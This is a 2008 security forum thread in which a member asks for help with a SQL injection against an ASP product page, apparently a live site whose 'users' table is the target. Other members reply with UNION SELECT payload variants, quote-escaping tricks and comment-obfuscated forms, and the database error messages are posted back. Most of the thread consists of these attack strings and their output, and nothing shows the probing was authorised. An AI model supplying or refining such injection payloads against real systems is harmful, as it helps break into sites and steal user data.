-
March 29th, 2008, 08:25 PM
#1
Member
sql help needed
When testing sql injection with this command:
?idProduct=-1+UNION+SELECT+1,2+FROM+users--
I am getting this error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'UNION'.
/productdisplay.asp, line 36
I have tried adding a quotation mark before UNION, but get another error message on unclosed quotation marks. What I think I should be aiming for is to get the "must have equal expression of target sites" error message. Can anyone help me out?
-
March 30th, 2008, 09:24 PM
#2
Well I can tell you that I highly doubt they are using columns named 1 and 2. Thats what you are telling it to do :-P
-
March 30th, 2008, 11:36 PM
#3
Member
Yeah i know that, but I'm expecting to get the "must have equal number of expressions" error message. Then just add numbers 3,4,5.... until there's no error message.Then I'll substitute in column names after that.
-
March 31st, 2008, 12:43 AM
#4
Im saying what you are essentially doing is writing a query that says:
SELECT 1,2 FROM users
but it need to look like:
Select CollumnNameA,CollumnNameB From Users where UserID = 1,2
-
March 31st, 2008, 02:10 PM
#5
Not necessarily, the only thing that matters is that the # of columns matches and that the type is correct...
If I had to guess I'd say there is possibly an issue with a quote somewhere...the other thing that looks odd is the negative product number...are you sure that isn't wigging it out?
There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.
(Merovingian - Matrix Reloaded)
-
March 31st, 2008, 02:43 PM
#6
Member
yeah i just added the -1 because I've noticed in the past that it normally works, but I tried without the negative and its the same error.
-
March 31st, 2008, 02:50 PM
#7
My best guess would be something to the effect of :
?idProduct=1'+UNION+SELECT+(1,2)+FROM+users--
?idProduct=1"+UNION+SELECT+(1,2)+FROM+users--
Since it is choking on the union, my thought is it has to be something with the argument to idProduct and how the script is enclosing it in the subsequent SQL query...
There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.
(Merovingian - Matrix Reloaded)
-
March 31st, 2008, 05:21 PM
#8
Member
Ok, with this injection:
1'+UNION+SELECT+(1,2)+FROM+users--
i get:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' UNION SELECT (1,2) FROM users--'.
/productdisplay.asp, line 36
and with this: 1''+UNION+SELECT+(1,2)+FROM+users--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near ''.
/productdisplay.asp, line 36
-
March 31st, 2008, 05:47 PM
#9
What does:
'+UNION+SELECT+(1,2)+FROM+users--
''+UNION+SELECT+(1,2)+FROM+users--
return? Note: no numeric argument there and the second is two '
or
1+UNION+SELECT+1,2+FROM+users/*
or
1/**/UNION/**/1,2/**/FROM/**/users/*
There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.
(Merovingian - Matrix Reloaded)
-
March 31st, 2008, 06:55 PM
#10
Member
These are just returning similar errors to before
Similar Threads
-
By earthrocker in forum Newbie Security Questions
Replies: 7
Last Post: August 5th, 2006, 03:43 PM
-
By mikester2 in forum Other Tutorials Forum
Replies: 5
Last Post: January 31st, 2005, 01:16 PM
-
By ch4r in forum Other Tutorials Forum
Replies: 5
Last Post: January 18th, 2005, 08:20 AM
-
By CXGJarrod in forum Microsoft Security Discussions
Replies: 0
Last Post: July 23rd, 2003, 10:00 PM
-
By s0nIc in forum AntiVirus Discussions
Replies: 2
Last Post: January 27th, 2003, 12:23 PM
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|